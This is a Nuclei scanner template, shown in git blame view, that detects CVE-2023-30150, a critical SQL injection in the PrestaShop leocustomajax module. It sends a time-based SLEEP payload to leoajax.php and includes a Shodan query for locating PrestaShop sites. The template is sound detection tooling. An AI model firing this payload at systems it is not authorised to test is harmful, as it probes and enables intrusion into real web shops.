nuclei-templates/http/cves/2023/CVE-2023-30150.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

2023-07-13 16:54:13 +00:00
id: CVE-2023-30150
info:
2023-08-02 03:53:57 +00:00
name: PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection
2023-07-13 16:54:13 +00:00
author: mastercho
2023-08-02 03:53:57 +00:00
severity: critical
2023-07-13 16:54:13 +00:00
description: |
2023-08-02 03:53:57 +00:00
PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.
2023-07-13 16:54:13 +00:00
reference:
2023-08-02 03:53:57 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-30150
2023-07-13 16:54:13 +00:00
- https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html
- https://www.tenable.com/cve/CVE-2023-30150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-30150
cwe-id: CWE-89
metadata:
max-request: 1
2023-08-02 03:53:57 +00:00
verified: true
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli
2023-07-13 16:54:13 +00:00
http:
- raw:
2023-08-25 11:37:43 +00:00
- |
GET / HTTP/1.1
Host: {{Hostname}}
2023-07-13 16:54:13 +00:00
- |
2023-08-02 03:53:57 +00:00
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
2023-07-13 16:54:13 +00:00
Host: {{Hostname}}
2023-07-13 17:04:28 +00:00
2023-07-13 16:54:13 +00:00
matchers:
- type: dsl
dsl:
2023-08-25 11:37:43 +00:00
- 'duration_2>=6'
2023-08-25 12:23:28 +00:00
- 'contains(tolower(response_1), "prestashop")'
2023-08-25 11:37:43 +00:00
condition: and